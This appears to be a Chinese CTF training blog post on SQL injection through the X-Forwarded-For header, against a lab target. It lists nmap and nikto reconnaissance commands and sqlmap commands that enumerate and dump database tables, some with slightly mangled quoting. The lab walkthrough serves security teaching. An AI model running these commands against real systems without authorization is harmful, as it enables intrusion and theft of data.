CTF训练 web安全SQl注入(X-Forwarded-For报文头)


SQL注入漏洞简介

SQl注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQl语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。

任何一个用户可以输入的位置都可能是注入点,比如url中,以及http报文中。

实验

(一)实验环境

  • 攻击机kail linux:192.168.1.104

  • 靶场机器:192.168.1.105

  • 目的:挖掘web漏洞,登录系统

(二)信息探测

  • 扫描主机服务信息以及服务版本
    – nmap -sV 靶场IP地址

  • 快速扫描主机全部信息
    – nmap -T4 -A -v 靶场IP地址

  • 探测敏感信息
    – nikto -host http://靶场IP地址:端口

(三)漏洞扫描

  • 漏洞扫描器 AVWS

  • 功能强大专注于web安全的漏洞扫描器。

(四)漏洞利用

针对web进行漏洞扫描

对扫描的结果进行分析,注意:如果具有SQL注入漏洞,可以直接利用,SQl注入漏洞为高危漏洞,可以直接获取服务器的权限。

使用sqlmap利用SQL注入漏洞

– sqlmap -u url -dbs 查看数据库名 --batch
– sqlmap -u url -headers=“X-Forwarded-For:" -D “数据库名” -table 查看对应数据库中的数据表 --batch
– sqlmap -u url -headers="X-Forwarded-For:
” -D “数据库名” -T “表名” -columns 查看对应字段 --batch
– sqlmap -u url -headers=“X-Forwarded-For:*” -D “数据库名” -T “表名” -C “列名” -dump --batch

总结

只要是用户可以输入的位置都是有可能存在注入点的!

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

梁辰兴

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值